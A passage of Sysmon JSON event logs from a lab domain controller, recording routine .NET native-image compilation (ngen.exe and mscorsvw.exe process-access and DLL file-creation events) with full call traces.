08:07:01.256","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-0010362E1000}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8107,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.256\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-0010362E1000}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.256","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-0010362E1000}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8108,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.256\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-0010362E1000}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.256","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-0010362E1000}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8109,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.397\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-001058C90F00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.397","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-001058C90F00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8110,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.397\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-001058C90F00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.397","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-001058C90F00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8111,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.397\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-001058C90F00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.397","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-001058C90F00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8112,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:04.272\r\nProcessGuid: {41C8662E-22A5-5F25-0000-0010F5311000}\r\nProcessId: 4772\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12a4-0\\System.Web.DataVisualization.dll\r\nCreationUtcTime: 2020-08-01 08:07:04.272","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:04.272","ProcessGuid":"{41C8662E-22A5-5F25-0000-0010F5311000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12a4-0\\System.Web.DataVisualization.dll","CreationUtcTime":"2020-08-01 08:07:04.272","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8113,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.350\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-00105C371000}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.350","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-00105C371000}","TargetProcessId":"4044","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8114,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.350\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-00105C371000}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.350","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-00105C371000}","TargetProcessId":"4044","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8115,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-00105C371000}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 